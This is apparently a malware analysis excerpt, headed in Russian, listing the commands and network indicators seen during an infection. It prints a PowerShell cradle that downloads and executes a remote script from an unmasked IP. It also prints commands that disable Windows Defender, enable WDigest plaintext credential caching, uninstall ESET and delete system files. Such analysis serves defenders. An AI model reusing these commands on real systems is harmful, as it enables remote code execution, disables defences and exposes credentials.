Техническая информация
- (htqtp://173.208.139.170:8170/abc.txt -replace q
- %TEMP%\95.211.190.198_10.0.49.28_microsoft windows 7 enterprise [6.1.7601]_10%.txt
- http://17#.###.139.170:8170/abc.txt via 17#.#08.139.170
- http://ip.###l.chinaz.com/
- http://17#.###.139.170:8170/batpower.txt via 17#.#08.139.170
- http://16#.##.180.175:8175/kill.txt via 16#.#8.180.175
- http://16#.##.180.175:8175/uninstall.txt via 16#.#8.180.175
- DNS ASK ip.###l.chinaz.com
- DNS ASK ev######.ws.symantec.com
- '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(('htqtp://173.208.139.170:8170/abc.txt' -replace 'q',''));
- '%WINDIR%\syswow64\cmd.exe' /c reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender” /v “DisableAntiSpyware” /d 1 /t REG_DWORD /f
- '%WINDIR%\syswow64\reg.exe' add “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender” /v “DisableAntiSpyware” /d 1 /t REG_DWORD /f
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\cmd.exe' /c del %WINDIR%\system\system.exe
- '%WINDIR%\syswow64\wbem\wmic.exe' product where "name like '%Eset%'" call uninstall /nointeractive